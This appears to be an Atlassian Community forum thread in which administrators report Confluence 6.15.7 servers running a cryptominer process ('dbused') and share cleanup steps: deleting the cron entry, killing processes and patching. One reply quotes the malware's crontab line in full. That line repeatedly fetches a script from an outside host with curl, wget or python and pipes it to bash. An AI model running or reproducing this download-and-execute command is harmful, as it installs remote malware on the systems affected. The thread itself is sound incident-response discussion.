Forums

Articles
Create
cancel
Showing results for 
Search instead for 
Did you mean: 

Virus Confluence September 1 - High load CPU consume

Gustavo Jimenez
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
September 1, 2021

Today, we saw a weird behaviour in our confluence in that dbused command is constantly executed in os system.

 

we see in this link https://community.atlassian.com/t5/Confluence-questions/No-access-to-Conlfuence-Webpage-100-CPU-usage-from-quot-dbused/qaq-p/1793393#U1793634

that is a problem in various confluence. we found a crontab that get a URL and allow it delete

 

do you have a solutions for this problem?

 

we had confluence 6.15.7

5 answers

1 accepted

0 votes
Answer accepted
Игорь Гаврилов
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
September 1, 2021

Virus

/var/spool/cron/crontabs/confluence

# DO NOT EDIT THIS FILE - edit the master and reinstall.

# (- installed on Wed Sep  1 18:32:32 2021)

# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)

* * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib3 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms

~                                             

1 vote
Kamil Beer September 2, 2021

Hey Gustavo,

after some time struggling, it seems that, at least for some time, I have managed to shut the miner, or whatever it was, down, and get Confluence running. What I did I did in a very short time window.

1) I removed the cron entry for confluence, which was located in /var/spool/cron

2) I killed all the suspicious processes, like the dbused

3) I applied Atlassian's patch.

From then, dbuserd didn't start, nor did the cronfile generate again.

Finally, I removed all the suspicious files from /tmp.

I'm now going to apply the LTE version.

0 votes
webenginenl
Contributor
September 6, 2021

Some files are set with chattr flags and harder to remove.

0 votes
Jasper Golze September 3, 2021

Same here, thanks for help.

0 votes
Kamil Beer September 2, 2021

Same here. I remove the crontab entry (found in /var/spool/cron/confluence), yet the crontab regenerates.

Suggest an answer

Log in or Sign up to answer
DEPLOYMENT TYPE
CLOUD
PERMISSIONS LEVEL
Product Admin
TAGS
AUG Leaders

Atlassian Community Events